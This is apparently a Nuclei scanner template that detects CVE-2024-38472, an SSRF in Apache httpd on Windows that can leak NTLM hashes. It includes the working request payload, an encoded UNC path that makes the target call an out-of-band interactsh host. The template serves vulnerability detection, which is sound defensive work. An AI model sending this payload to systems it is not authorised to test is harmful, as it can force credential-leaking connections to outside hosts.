id: CVE-2024-38472 info: name: Apache HTTPd Windows UNC - Server-Side Request Forgery author: pdteam severity: high description: | SSRF in Apache HTTP Server on Windows allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests or content Users are recommended to upgrade to version 2.4.60 which fixes this issue. Note- Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing. reference: - https://blog.orange.tw/2024/08/confusion-attacks-en.html - https://httpd.apache.org/security/vulnerabilities_24.html - https://security.netapp.com/advisory/ntap-20240712-0001/ - https://github.com/nomi-sec/PoC-in-GitHub - https://github.com/Abdurahmon3236/CVE-2024-38472 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-38472 cwe-id: CWE-918 epss-score: 0.00043 epss-percentile: 0.09568 tags: cve,cve2024,apache,ssrf,oast,httpd http: - method: GET path: - "{{BaseURL}}/%5C%5C{{interactsh-url}}/apachehttpd" matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: interactsh_request words: - "/apachehttpd" # digest: 4a0a004730450220666be006200dc90d43763aa77ad46663ff86bb4ac682140cb99017bbc5456e6e022100ba792f62eed38a0123650503050206c8741204cb3f854909ca7e25f98972bc7c:922c64590222798bb761d5b6d8e72950